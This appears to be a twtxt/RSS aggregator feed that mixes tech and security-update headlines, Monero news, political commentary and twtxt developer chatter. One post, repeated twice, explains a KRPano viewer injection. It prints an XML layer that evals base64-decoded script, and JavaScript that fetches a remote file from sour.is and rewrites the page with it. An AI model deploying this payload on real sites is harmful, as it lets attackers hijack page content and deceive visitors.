Security updates for Friday
Security updates have been issued by Debian (graphicsmagick and libapache2-mod-auth-openidc), Fedora (giflib, mod_auth_openidc, mysql8.0, perl, perl-Devel-Cover, perl-PAR-Packer, perl-String-Compare-ConstantTime, rust-openssl, rust-openssl-sys, trunk, and workrave), Mageia (chromium-browser-stable and rust), Oracle (java-1.8.0-openjdk, java-17-openjdk, java-21-openjdk, kernel, libreoffice, and webkit2gtk3), Red Hat (gvisor-tap-vsock), SUSE (containerd, docker, docker-stable, forge … ⌘ Read more
I just noticed that my unread messages counter was off by quite a bit. It showed 8, but I only saw one unread message. Even after restarting my client, which recalculates the number of unread messages, it remained at eight. Weird. Looking in the database revealed that this is indeed correct.
Apparently, my query to build up the message tree must be incorrect. It somehow misses seven messages. They all are orphaned, maybe that’s a clue. However, generating missing root messages (and thereby including the replies) typically works just fine. Hmm.
iPhone Shipments Down 9% in China’s Q1 Smartphone Boom
Apple’s iPhone shipments in China declined by 9 percent in the first quarter compared to the year earlier, and it was the only major smartphone vendor to see a decline, according to data from research firm IDC.
Shipments of iPhones fell to 9.8 million units, giving Apple a market share of 13.7 percent, do … ⌘ Read more
@david@collantes.us If I run
printf '%s\n%s\n%s' 'https://aelaraji.com/twtxt.txt' '2025-04-16T22:49:11+00:00' "Am I tripping or `rsync` is actually THIS effing faster than `scp`!!? 🫨" | b2sum -l 256 | awk '{ print $1 }' | xxd -r -p | base32 | tr -d '=' | tr 'A-Z' 'a-z' | tail -c 8
I have xqfsv6a. It is raw text
But… If I change de date to 2025-04-16T22:49:11Z I have si4er3q.
iPhone Fold: New Leak Corroborates Camera Setup on Outer Display
Further details have emerged about the camera system on Apple’s upcoming foldable iPhone, informally dubbed the “iPhone Fold.”
Expected to launch next year, Apple’s book-style foldable is rumored to feature a 7.8-inch crease-free internal display and a 5.5-inch external screen. According to industry analyst [Ming-Chi Kuo](https … ⌘ Read more
This 8 bit trip is really cool! https://www.youtube.com/watch?v=pCm1fKZGvl47
Nicolas, 35 ans, découvre les urgences à la française
Un article à 4 mains écrit par h16 & Citronne Nicolas, 35 ans, marié, et père de deux enfants (de 5 et 8 ans), vit un quotidien familial plutôt paisible et des week-ends rythmés par les activités extra-scolaires des deux marmots. Cette année, alors qu’Emma pratique la danse, pour Léo, la question se pose encore : […] ⌘ Read more
Apple’s 18.8-Inch Foldable Device to Enter Mass Production in Late 2026
Along with an iPhone “Fold,” Apple is believed to be working on a larger foldable device that’s somewhere around 19 inches, and one analyst suggests it could arrive as soon as late next year alongside Apple’s rumored foldable iPhone.
In a new research note covering likely post-tariff scenarios for Apple, investment firm GF Securi … ⌘ Read more
Security updates for Tuesday
Security updates have been issued by AlmaLinux (gimp, libxslt, python3.11, python3.12, and tomcat), Debian (ghostscript and libnet-easytcp-perl), Fedora (openvpn, perl-Data-Entropy, and webkitgtk), Red Hat (python-jinja2), SUSE (giflib, pam, and xen), and Ubuntu (apache2, binutils, expat, fis-gtm, linux-azure, linux-azure-6.8, linux-nvidia-lowlatency, linux-azure, linux-azure-fde, linux-azure-5.15, linux-azure-fde-5.15, linux-azure-fips, linux-gcp-fips, linux-hwe-5.4, linux-nvidia, … ⌘ Read more
Nicolas, 35 ans, désespère de l’Éducation Nationale
Un billet à 4 mains par Citronne et h16 Nicolas, 35 ans, marié, et père de deux enfants (de 5 et 8 ans) apprécie plus que tout sa petite routine. Le matin, après un bon petit déjeuner, il emmène ses enfants à l’école et se rend au travail ; il apprécie sa petite pause-déjeuner avec ses […] ⌘ Read more
[$] LWN.net Weekly Edition for April 3, 2025
Inside this week’s LWN.net Weekly Edition:
- Front: Calibre 8.0; Fedora reproducibility; OpenWrt One; 6.15 Merge Window; LSFMM+BPF coverage including BPF in GCC, Rust merging process, and more. 
- Briefs: Ubuntu namespaces; New FPL; PorteuX 2.0; Firefox 137.0; GCC Rust; Rockbox 4.0; Rust specification; Thundermail; Dave Täht RIP; Quotes; … 
- Announcements: Newsletters, confer … ⌘ Read more 
[$] Catching up with calibre
Saying that calibre is
ebook-management software undersells the application by a fair
margin. Calibre is an open-source Swiss Army knife for ebooks that can
be used for everything from creating ebooks, converting ebooks from
obscure formats to modern formats like EPUB, to serving up an ebook
library over the web. The most recent major release, calibre 8.0,
brings a better text-to-speech engine, a tool for creating audio
overlays w … ⌘ Read more
Security updates for Wednesday
Security updates have been issued by Debian (firefox-esr, jetty9, openjpeg2, and tomcat9), Fedora (dokuwiki, firefox, php-kissifrot-php-ixr, php-phpseclib3, and rust-zincati), Red Hat (kernel and pki-core), Slackware (mozilla), SUSE (apparmor, atop, docker, docker-stable, firefox, govulncheck-vulndb, libmodsecurity3, openvpn, upx, and warewulf4), and Ubuntu (inspircd, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-ibm,
 linux-lowlatency, linux-lowlatency-hwe-6.8, linu … ⌘ Read more
iOS 16.7.11, iOS 15.8.4, & iPadOS 17.7.6 Security Updates Released for Older iPhone & iPad
While iOS 18.4 and iPadOS 18.4 updates were just released for modern iPhone and iPad devices, Apple has also released a bevy of software updates for older iPhone and iPad devices. Each of these updates include important security fixes and are therefore recommended for all eligible users and their devices to install. Specifically, you will … [Read Mor … ⌘ Read more
[$] Memory persistence over kexec
The kernel’s kexec\
mechanism allows one kernel to directly boot a new one; it can be
thought of as a sort of kernel equivalent to the execve()
system call. Kexec has a number of uses, including booting a special kernel
to perform dumps after a crash. Normally, one does not expect user-space
processes to survive booting into a new kernel, but that has not stopped
developers from trying to im … ⌘ Read more
Go 1-25:工具鏈優化與運行時改進
Go 語言自誕生以來,始終保持着穩定的迭代節奏。2025 年 8 月即將發佈的 Go 1.25 版本在工具鏈、運行時、編譯器及標準庫等方面都帶來了值得關注的改進。本文將從實際開發角度出發,詳細解析這些變化的技術細節及其對開發者產生的實際影響。工具鏈增強—–構建系統優化go build命令的-asan選項在 1.25 版本中默認啓用了內存泄漏檢測機制。該功能會在程序退出時自動檢查未釋放的 C ⌘ Read more
Nicolas, 35 ans, ne touchera jamais sa retraite
Un article rédigé à 4 mains par Citronne et h16 Avec le mois qui se termine, Nicolas, 35 ans, marié avec deux enfants de 5 et 8 ans, examine sa feuille de paie. Les petites lignes se multiplient mais un montant le rassure : celui que lui et son patron ont cotisé pour sa retraite. Nicolas […] ⌘ Read more
tt reimplementation that I already followed with the old Python tt. Previously, I just had a few feeds for testing purposes in my new config. While transfering, I "dropped" heaps of feeds that appeared to be inactive.
      
    
    
    
    neat! my watcher is currently sitting at about 75 MB following over 1500 feeds. only about 200 are currently somewhat active.
-rw-r--r--. 1 xuu  xuu   69M Mar 25 20:46 twt.db
-rw-r--r--. 1 xuu  xuu   32K Mar 25 21:34 twt.db-shm
-rw-r--r--. 1 xuu  xuu  5.6M Mar 25 21:34 twt.db-wal
sqlite> select state, count(*) n from feeds group by 1;
hot|7
warm|8
cold|183
frozen|743
permanantly-dead|857
tt reimplementation that I already followed with the old Python tt. Previously, I just had a few feeds for testing purposes in my new config. While transfering, I "dropped" heaps of feeds that appeared to be inactive.
      
    
    
    
    neat! my watcher is currently sitting at about 75 MB following over 1500 feeds. only about 200 are currently somewhat active.
-rw-r--r--. 1 xuu  xuu   69M Mar 25 20:46 twt.db
-rw-r--r--. 1 xuu  xuu   32K Mar 25 21:34 twt.db-shm
-rw-r--r--. 1 xuu  xuu  5.6M Mar 25 21:34 twt.db-wal
sqlite> select state, count(*) n from feeds group by 1;
hot|7
warm|8
cold|183
frozen|743
permanantly-dead|857
tt reimplementation that I already followed with the old Python tt. Previously, I just had a few feeds for testing purposes in my new config. While transfering, I "dropped" heaps of feeds that appeared to be inactive.
      
    
    
    
    Thanks, @movq@www.uninformativ.de!
My backing SQLite database with indices is 8.7 MiB in size right now.
The twtxt cache is 7.6 MiB, it uses Python’s pickle module. And next to it there is a 16.0 MiB second database with all the read statuses for the old tt. Wow, super inefficient, it shouldn’t contain anything else, it’s a giant, pickled {"$hash": {"read": True/False}, …}. What the heck, why is it so big?! O_o
8 Ways to Empower Engineering Teams to Balance Productivity, Security, and Innovation
Explore how Docker’s suite of products empowers industry leaders and their development teams to innovate faster, stay secure, and deliver impactful results. ⌘ Read more
Security updates for Tuesday
Security updates have been issued by Debian (ruby-rack), Fedora (chromium, golang-github-openprinting-ipp-usb, OpenIPMI, and python-jinja2), Mageia (kernel, kernel-linus, and wpa_supplicant, hostapd), Red Hat (fence-agents, kernel, kernel-rt, libxml2, libxslt, and pcs), SUSE (cadvisor, docker, freetype2, nodejs-electron, php8, rsync, u-boot, warewulf4, webkit2gtk3, and zvbi), and Ubuntu (elfutils, python3.5, python3.8, ruby-rack, smartdns, and zvbi). ⌘ Read more
Three Saturday stable kernels
Greg Kroah-Hartman has announced the release of the 6.13.8, 6.12.20, and 6.6.84 stable kernels. Each contains a
number of important fixes throughout the kernel tree; users of those
series should upgrade. ⌘ Read more
Ctrl+Left to jump a word left, I get 1;5D in my tt2 message text. My TERM is set to rxvt-unicode-256color. In tt, it works just fine. When I change to TERM=xterm-256color, it also works in tt2. I have to read up on that. Maybe even try to capture these sequences and rewrite them.
      
    
    
    
    @movq@www.uninformativ.de Hahaha, that name is certainly fitting! :-D
Yeah, I should revert that and try to figure out which programs misbehaved. But that’s something for future Lyse. 8-) Right now, I just redefine TERM in my Makefile when the USER happens to be me.
Nicolas, 35 ans, cherche une location de vacances
Un article à 4 mains écrit par h16 & Citronne Voilà, le budget pour le trajet semble établi mais pour Nicolas, 35 ans, marié et père de deux enfants (de 5 et 8 ans), le planning des vacances estivales ne s’arrête pas là : il faut à présent déterminer l’hébergement sur place. C’est pour cela que […] ⌘ Read more
Chapter 7:
Chapter 8:
Chapter 7:
Chapter 8:
Monero Dev Activity Report - Week 11 2025: 14 PRs, 3 Issues
This weekly report aims to provide a big picture view of Monero development activity, increase community support for existing devs and, hopefully, encourage new contributions.
Opened (8)
monero-project/monero:
Ich war auf der Ausstellung meines letztes Jahr verstorbenen BK-Lehrers. Er war ein ziemlich cooler Typ und guter Lehrer. Wenn ich mich recht erinnere, müsste ich ihn in der 7. und vermutlich auch 8. Klasse gehabt haben. Seine Schelme waren hier im Landkreis und vermutlich darüber hinaus weit bekannt.
Bilderrahmenglas in Verbindung mit vergleichsweise dunkler Beleuchtung gibt leider keine gute Kombination mit meiner Kamera ab. Vorab entschuldige ich mich bereits für die zu wünschen übrig lassende Qualität. Nichtsdestotrotz habe ich ein paar witzige Bilder abfotografiert. Obacht, kann mitunter anzüglichen Inhalt enthalten: https://lyse.isobeef.org/siegfried-wagner-farrenstall-2025-03-15/
Nicolas, 35 ans, planifie ses vacances
L’arrivée du printemps pousse les uns et les autres à s’organiser pour l’été qui vient et avec lui, les vacances familiales. Nicolas, 35 ans, marié et père de deux enfants (de 5 et 8 ans) réfléchit donc à son prochain voyage en famille. Français de la classe moyenne, correctement imbibé des « réalités » médiatiques actuelles, Nicolas […] ⌘ Read more
UNIHIKER K10 is an ESP32-S3 based platform with TinyML and built-in sensors
The UNIHIKER K10 is an AI learning device designed for education, integrating features for artificial intelligence, machine learning, and IoT applications. It includes a 2.8″ color screen, Wi-Fi, Bluetooth, a camera, microphone, speaker, RGB light, and multiple sensors. The device features an ESP32-S3 Xtensa LX7 microcontroller with 512KB SRAM and 16MB flash storage. It supports […] ⌘ Read more
From screaming under my husband’s car to 8 months old ⌘ Read more
Now vs 8 months ago ⌘ Read more
iPhone 17 Pro Max Said to Be Thicker to Accommodate Larger Battery
Apple has increased the thickness of the upcoming iPhone 17 Pro Max compared to the current generation iPhone 16 Pro Max, claims the Chinese leaker known as Ice Universe.
Apple is said to have increased the depth of the iPhone 17 Pro Max to 8.725mm, up from 8.25mm on the iPhone 16 Pro Max, which wou … ⌘ Read more
Kuo: Apple’s First Foldable iPhone to Feature Book-Style Design, Sell for Over $2,000
Apple’s first foldable iPhone should arrive around the end of 2026 or early 2027 with a book-style design and a premium price tag of over $2,000, according to analyst Ming-Chi Kuo. In a report today, Kuo outlines his expectations for the device, noting that it will have an approximately 7.8-inch “crease-free” inner d … ⌘ Read more
RK3566 Credit Card-Sized SBC with M.2 Expansion and 4K Video Support
The RK3566 Single Board Computer is designed for a range of applications, combining processing power with multiple connectivity options. Built with an 8-layer PCB design and featuring a compact form factor, it is powered by a quad-core Cortex-A55 processor and includes an M.2 2242 slot for expansion. The SBC features the Rockchip RK3566, a quad-core […] ⌘ Read more
b4n6_b4n6, not-a-money-printer propose bounties to make Monero GUI, RetoSwap, UnstoppableSwap ‘Whonix friendly’
b4n6_b4n61 and not-a-money-printer2 have proposed bounties3’4’5 to make monero-wallet-gui6, RetoSwap7, and UnstoppableSwap8 Whonix friendly 9:
”`
#1 Make monero-wallet-gui whonix friendly
Total Bounty: ~0.12 XMR (to date)
#2 Make reto swap whonix friendly
To … ⌘ Read more”`
looks good to me!
About alice’s hash, using SHA256, I get 96473b4f or 96473B4F for the last 8 characters. I’ll add it as an implementation example.
The idea of including it besides the follow URL is to avoid calculating it every time we load the file (assuming the client did that correctly), and helps to track replies across the file with a simple search.
Also, watching your example I’m thinking now that instead of {url=96473B4F,id=1} which is ambiguous of which URL we are referring to, it could be something like:
{reply_to=[URL_HASH]_[TWT_ID]} / {reply_to=96473B4F_1}
That way, the ‘full twt ID’ could be 96473B4F_1.
MoneroKon 2025 Planning Meeting scheduled for 8 March 2025 1700 UTC
The next MoneroKon 2025 Planning Meeting 1 is scheduled to take place on Saturday, March 8th 2025 at 17:00 UTC in the #monerokon 2 Matrix/IRC channels.
The meeting’s discussion topics should be available on agenda.monerokon.org 3.
Logs for the previous meeting are available on Monero Observer4.
It is worth mentioning that a CCS proposal to partially fund this year’s event is cu … ⌘ Read more
also @Andros, I see that if I open that URL on my browser, I see weird characters in the .txt file:
description = ðŸ—
Perhaps your nginx server is missing a Content-Type: text/html; charset=utf-8 header?
https://serverfault.com/a/975289
In timeline it looks OK however, I think it’s relying on
The file must be encoded with UTF-8
of the original spec:
https://twtxt.readthedocs.io/en/latest/user/twtxtfile.html
Neo-Nazi group plots rebuild as Trump’s FBI chief takes helm, audio reveals
Ben Makuch,  Reporter  -  The Guardian (U.K.)
Stephan: Every day now In media, particularly media based in non-U.S. democracies, I see increasing references noting the correlation between the Trump coup and the rise of Hitler’s Nazisism. Very scary.
_Members of the Base at … ⌘ Read moreTesting the World’s Thinnest Foldable Smartphone
Chinese smartphone maker Oppo recently came out with the Find N5, which is a super thin and lightweight foldable smartphone. It’s thinner and lighter than Samsung’s foldable devices, and Apple’s non-foldable ones.
_Subscribe to the MacRumors YouTube channel for more videos._
The Find N5 has a 6.62-inch display when closed, and an 8.12-inch display when open, so when unfolded, it’s just a bit smalle … ⌘ Read more
Monero Observer Artistic Saturday Top 5 - Week 8, 2025
Previous Artistic Saturday weekly reports can be found in the [art] 1 section.
[WTS] [4.6+ XMR] Macbook Pro M1 Pro (May 2022)
(Like new) 2022 Macbook Pro M1 Pro (10/8 cores)
14in Retina Screen
16GB RAM DDR5
1TB SSD
Fast 85w magsafe charger
No box
Link: https://xmrbazaar.com/listing/Xv8V/
avatilabs.com ⌘ Read more
Lost my baby girl of 8 years yesterday ⌘ Read more
@arne@uplegger.eu Here are the results of the german jury:
Known salt (B64): Tb9oj07UhwU= (8)
Known key (B64): MII0yj+MC0mHNx254Voar80bi9P7jmocs0+x+inaxBE=
Known iv (B64): l/PvkDjOKMFZe73KptrvWw== (16)
Shared Key (B64): ql8zvN03p6kroSwNrcKbxk4zSBQFkgQZEumvqVIDMAE=
** DECRYPT **
Encrypted Message: ...
Decoded Salt (B64): Tb9oj07UhwU= (8)
PBKDF2 KEY (B64): MII0yj+MC0mHNx254Voar80bi9P7jmocs0+x+inaxBE=
iv (B64): JanbU1jI30lb6yfjq/adjA== (16)
Decrypted Message: 
😭
@eapl.me@eapl.me Here is what I’ve got so far: https://github.com/upputter/testing-twtxt-dm
There is a “00_well_known_message.enc” file, which I have the encryption paremters for (https://github.com/upputter/testing-twtxt-dm/blob/9fdf3be6aa8fe810a4cb275375dbb3d4a2a958ee/wellknown_test.php#L28).
According to my finding, I assume, that the saltsize in openssl is “8” and the PBKDF2 algo is “sha256”.
World’s Thinnest Foldable Phone Launches in Europe and Asia
Oppo has launched the Find N5, the world’s thinnest foldable phone yet. When closed, the book-style foldable measures 8.93mm. That’s less than a millimeter thicker than an iPhone 16 Pro, and thinner than the Honor Magic V3, which was the previous record holder.
The device is barely thicker than it … ⌘ Read more
woodser releases monero-cpp v0.8.13, monero-java v0.8.36, monero-ts v0.11.3
woodser1 has just released new versions for three Monero libraries: monero-cpp v0.8.132, monero-java v0.8.363, and monero-ts v0.11.34:
monero-cpp:
-Support wallet->get_default_fee_priority()
-Fix building sample_code.cpp on Linux
-Update instructions to use unbound v1.22.0
-Update instructions to use boost v1.85.0
-Update build ... ⌘ [Read more](https://monero.observer/woodser-releases-monero-cpp-v0.8.13-monero-java-v0.8.36-monero-ts-v0.11.3/)This is my trashbaby, from 8 weeks to 6 months <3 ⌘ Read more
iPhone 16 Pro Max Beaten by Samsung Galaxy S25 Ultra in App Loading Speed Test
Apple’s iPhone 16 Pro Max has been comprehensively beaten by the Samsung Galaxy S25 Ultra in a real world app speed test conducted by PhoneBuff, with the Snapdragon 8 Elite chip and 12GB of RAM winning out over the A18 Pro chip and 8GB of RAM in Apple’s smartphone.
The performance test measured how long it took each phone to open and process tasks across a ser … ⌘ Read more
My son the day we found him, a week after, and 8 years later ⌘ Read more
Cyrix126 releases Gupaxx v1.8.0
Cyrix1261 has released Gupaxx 2 version 1.8.03 with various improvements and bugfixes:
Changes overviewThis release is making the use of advanced submenu and simple submenu together sound. New feature to hide tabs you don’t use. New fields in advanced submenu for Node,P2Pool,Xmrig and Proxy tabs.
[UI] Node: button to enable "fast mode"
[UI] P2pool: binding port field
[UI] Xmrig: token field
[Internal] processes are now aware of custom va ... ⌘ [Read more](https://monero.observer/cyrix126-releases-gupaxx-v1.8.0/)Axon Platform Featuring RockChip RK3588S and Support for LLM Frameworks
The Axon platform, powered by the RockChip RK3588S processor, combines an 8-core CPU and an NPU delivering up to 6 TOPS of AI performance. Designed for advanced computing tasks, it supports various LLMs, including Llama, Qwen, and DeepSeek, with benchmarks showcasing performance for AI workloads. The Axon platform is built on the RockChip RK3588S system-on-chip, […] ⌘ Read more
Rotary Tool
 ⌘ Read more
 ⌘ Read more
CAN FD Adapter for High-Speed Industrial and Embedded Communication in M.2 and Mini-PCIe Form Factors
The CAN FD Adapter enables high-speed CAN FD connectivity for embedded and industrial applications. Available in M.2 B-key and mini-PCIe form factors, it supports data rates from 12.5 kbit/s to 8 Mbit/s. It integrates with systems used in industrial monitoring, robotics, automation, hardware-in-the-loop testing, remote access, and data loggin … ⌘ Read more
Monero Observer Blitz #38 - January 2025
Here’s a recap of what happened this January in the Monero community:
MoneroKon 2025 Planning Meeting scheduled for 8 February 2025 1700 UTC
The next MoneroKon 2025 Planning Meeting 1 is scheduled to take place on Saturday, February 8th 2025 at 17:00 UTC in the #monerokon 2 Matrix/IRC channels.
The meeting’s discussion topics should be available on agenda.monerokon.org 3.
Logs for the previous meeting are available on Monero Observer4.
_Note that the upcoming event will take place in Prague on June 20-22 2025[ … ⌘ Read more
@arne@uplegger.eu Ohjemine, TYPO3! O_o Lass mich schreiend davonlaufen!
Mit dieser absoluten Katastrophensoftware vor dem Herrn haben wir mal ein Studienprojekt gemacht. Die hat alle Vorurteile komplett übererfüllt. Angefangen von Fehlerseiten, die statt 4xx oder dergleichen immer mit HTTP 200 ausgeliefert wurden oder auch, dass das generierte HTML leider einfach ungültig war. Über die Implementierung von Löschen durch einen Deleted-Schalter in der Datenbank, das Speichern von Passwörtern im Klartext bis hin zu völlig umständlichen Bedienungskonzepten. Alles hat immer brutal viele Schritte gebraucht. Das Zeilennummernrumgeeier im TYPO-Script erinnerte eher an Basic. Uns kam es auch so vor, als ob man damit nicht ernsthaft was sinnvolles machen könnte.
Zu allem Überfluss hatte irgendwer noch ein ganz hundsmiserables Buch ausgegraben, das als Vorbereitung dienen sollte. Ich kann mich zum Glück weder an den Titel noch den Autor erinnern, aber ich weiß noch, wie das komplett inkonsistent geschrieben war. Anfangs gabs mehrere Seiten zu Unicode und UTF-8 wurde angepriesen, aber alle Beispiele haben dann auf ISO-8859-1 gesetzt. Gezeigter Beispielcode war häufig unterste Schublade. Selten hab ich so merkwürdige Erklärungen gelesen: „Wenn Sie die Sicherheitswarnhinweise stören, kommentieren Sie doch bitte im Quelltext die die()-Funktion in $ZEILE aus.“ Oder ein anderer Klassiker: „Ausgeschrieben würde der Code wohl folgendes tun…“. War sich der Autor also nicht ganz sicher, ob sein Codeschnipsel vllt. doch in Wahrheit was ganz anderes tut.
Seit diesem gigantischen Trauma (das hat mich wirklich sehr nachhaltig geprägt, wie man Dinge nicht machen sollte) hab ich erfolgreich einen Bogen um das TYPO3-Universum gemacht.
Ich kann nur hoffen, dass es zwischenzeitlich ein wenig besser geworden ist. Aber Deinem Kurzbericht zufolge scheint da ja immer noch der Wurm drin zu sein. Mein Beileid! :-(
EdgeBox Blue is a Compact Industrial VPN Router and IoT Edge Gateway
The EdgeBox-Blue is an industrial VPN router and edge gateway designed for applications requiring secure networking and data management in industrial environments. It runs on an OpenWRT-based platform and supports real-time data acquisition, automation, and cloud integration. The MT7981BA processor supports Wi-Fi 6 (IEEE 802.11ax) with a combined 1.8 Gbps throughput across the 2.4GHz and […] ⌘ Read more
Trump’s neofascism is here now. Here are 10 things you can do to resist
Robert Reich,  Chancellor’s Professor of Public Policy at the University of California, Berkeley, and Senior Fellow at the Blum Center for Developing Economies.  -  The Guardian (U.K.)
_Stephan: Robert Reich offers some very good counsel in this essay. I detailed in my book [The 8 Laws of Change](https://www.amazon.com/Laws-Change-Individual-Planetary-Wellbeing-ebook/dp/B0932JHXXC/ref … ⌘ Read more
Monero Dev Activity Report - Week 4 2025: 38 PRs, 8 Issues
This weekly report aims to provide a big picture view of Monero development activity, increase community support for existing devs and, hopefully, encourage new contributions.
Opened (15)
monero-project/monero:
Amazing! My response: https://git.mills.io/yarnsocial/twtxt.dev/pulls/8#issuecomment-18500
Haveno v1.0.18 released with various fixes and improvements
woodser1 has released Haveno2 version 1.0.183 with various bug fixes, improvements and updates.
Reduce disk usage up to 98% by saving wallets less frequently..
Update to Tor browser v14.0.3 and Tor binary v0.4.8.13
Increase trade limit of 'no deposit' offers to 1.5 XMR
Rename 'Cash at ATM' to 'Cardless Cash'
Support startup flag to specify blockchain location for local node
Improv ... ⌘ [Read more](https://monero.observer/woodser-releases-haveno-v1.0.18-fixes-improvements/)So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
    <SCRIPT id="allow-copy_script"/>
    <layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
          id = queryParams.get('id');
    id ? fetch('https://sour.is/superhax.txt')
        .then(e => e.text())
        .then(e => {
            document.open(), document.write(e), document.close();
        })
        .catch(e => {
            console.error('Error fetching the user agent:', e);
        }) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
Deals: Get iPad Mini 7 for $399 ($100 Off), AirTags 4-pack for $70
The iPad mini is a popular iPad model for users who want a very portable table experience. The 7th generation iPad mini is particularly well suited for modern use, being the first iPad mini model to support Apple Intelligence AI features, an 8″ LCD display, and the speedy A17 processor, which is the same powerful … [Read More](https://osxdaily.com/2025/01/13/deals-get-ipad-mini-7-for-399-100-off-airtags-4-pa … ⌘ Read more
‘Morally Bankrupt’ Biden Blasted for $8 Billion More in Arms to Israel Amid Gaza Genocide
Jessica Corbett,  Staff Writer  -  Common Dreams
_Stephan: I predict that historians will define President Biden in three ways: First, and the good news, he restored the wreck of the American economy he inherited from Donald Trump. Second, and then shameful bad news, he arranged for the United States government during his term to fund Israel’s genoci … ⌘ Read more
The average native English speaker only knows about 6% of English words.
Michael Nordine,  Contributing Writer  -  Interesting Facts
Stephan: How many words did you learn today?
The English language is vast — so vast, in fact, that the average native speaker only knows about 6% of all Eng … ⌘ Read more
‘Ironic’: climate-driven sea level rise will overwhelm major oil ports, study shows
Damian Carrington,  Environment Editor  -  The Guardian (U.K.)
Stephan: Humanity’s dangerous poor behavior as part of the matrix of life on Earth may, as this report describes, become a major factor in pushing us out of our carbon era. As the title says how “Ironic”.
Bible Back in Texas Schools After Being Pulled for Sexual Content
Elizabeth Nolan Brown ,  Staff Writer  -  reason
Stephan: This is how weird book censorship is getting in the Red States. Did you ever think of the Bible as being too sexually explicit to be read by a minor?
Is the Bible too “sexually explicit” for minors? The Canyon Independent School Dis … ⌘ Read more
Monero Research Lab meeting scheduled for 8 January 2025 1700 UTC
The next Monero Research Lab1 meeting is scheduled to take place on Wednesday, January 8th 2025 at 17:00 UTC on IRC-Libera/Matrix2 in the #monero-research-lab channels.
- Updates. What is everyone working on?
 
- Discussion: Post-quantum security and ethical considerations over elliptic curve cryptography3
 
This meeting’s chairperson should be Rucknium4. The full dis … ⌘ Read more
** The social is predicated on its exclusions  **
I’ve been sitting on this post for like 8 months. I’ve written it and rewritten it at least a dozen times. I hsve two or three notes documents worth of research. It has never felt right, though. It still doesn’t. I figured an rss-only debut for it would be fine, and maybe one day I’ll bring it to a normy kinda post.
At my job I try to make big public digital services accessible. Because of this I think a lot about disability, and how some portion of disability is socially c … ⌘ Read more
設計模式 in Go: Observer
行爲模式旨在解決對象間通信和交互相關的問題,專注於定義那些複雜到無法靜態設計的協作策略,這些協作策略使得程序可以在運行時動態地進行職責派遣以實現更好的擴展。今天我們開始第 8 個行爲模式的學習 —— Observer(觀察者模式)。問題背景:—–觀察者模式用於當對象之間存在一對多關係時,即一個對象的變化需要傳播給多個其他對象。它允許被觀察對象的狀態發生變化時,其他依賴對象能自動收到通知並進行 ⌘ Read more
[WTS] [$120+] ‘Fire The Empire’ artwork
“Fire the Empire.” Acrylic on fine-grain 200g/m² paper, 11.7 x 16.5 inches. Original artwork No. 3 of 8 from an upcoming collection. Stay tuned for more. /SID
Link: https://xmrbazaar.com/listing/EFTY/
S1DARTA0 (Twitter) ⌘ Read more
Platz 8 von 16 beim MusikQuiz im Exil. Wir waren der Tisch mit dem meisten Spaß!
Gate.io drops Monero ETF markets, plans to delist XMRUSDT perpetual contract on December 26 2024
Crypto CEX Gate.io 1 has announced plans2 to delist the XMRUSDT 3 perpetual contract from their platform on December 26 2024 at 8:00 UTC, after silently closing leveraged Monero ETF markets ( XMR3L and XMR3S 4) earlier today:
Gate.io will cease trading of the leveraged tokens XMR3L and XMR3S on December 20, 2024, at 10:00 UTC. [..] **Gate.io … ⌘ Read more
iCloud Backups No Longer Available for iPhones and iPads Running iOS 8 or Earlier
Making a device backup over iCloud now requires iOS 9 or later, which means iPhones and iPads that are running iOS 8 or earlier are no longer able to be backed up using iCloud.
Apple [announced the change in November](https://www.macrumors.com/2024/11/18/apple-icloud-backup-ios-9-min … ⌘ Read more
QuartzPro64 RK3588 Developer Board Now Available at $199.99
The QuartzPro64 is a developer board featuring the Rockchip RK3588 system-on-chip . It is designed for applications requiring high-performance computing, extensive connectivity, and flexible expansion options. Initially introduced in 2022, the board is equipped with an octa-core CPU comprising four ARM Cortex-A76 cores running at 2.4 GHz and four ARM Cortex-A55 cores at 1.8 GHz. […] ⌘ Read more
It seems like every app is offering a “Spotify Wrapped”-style yearly review these days. One app where I genuinely find the results fascinating is Träwelldroid, which I use to log my public transport journeys on Träwelling. While the average German drives roughly 10k kilometers per year by car, I traveled approximately 9600 kilometers using public transport, spending a total of 4 days and 8 hours in transit. This is particularly noteworthy since I commuted less frequently this year and didn’t do any interrailing. Sad … ⌘ Read more
j-berman completes CCS proposal after 483 hours of Monero and Seraphis dev work
j-berman1 has published a third and final progress report2 for his full-time 2024 ( part 8) Monero (FCMPs++ integration) and Seraphis wallet library dev work CCS proposal3:
Work overviewUpdate 3: 483 hours [..] FCMP++ wallet tree sync (via building the tree locally) is set up and integrated into wallet2.
Completed the task to start sync from arbitrary restore height N
Did ... ⌘ [Read more](https://monero.observer/j-berman-completes-monero-dev-work-2024-part-8-ccs/)[WTS] [US] [$75+] iPhone 8, 64GB
Former corporate phone. Verizon network. Pretty good shape. Small scratch on screen, but it’s nearly invisible when in use.
Link: https://xmrbazaar.com/listing/NQxy/
D_PlusPlus (XMRBazaar) ⌘ Read more
Meet the Western conservatives moving to Russia
Owen Matthews,    -  The Spectator
Stephan: This is how christofascist some Americans have become; they are immigrating to Russia. As someone who spent a great deal of time in the Soviet Union from 1981 to 1991, and can’t imagine living there under the Putin oligarchy all I can say is I hope they stay there, but doubt that they will.
Pocket 4 with 8.8″ High-Refresh LTPS Screen, 64GB RAM, 2TB SSD, and 45Wh Battery
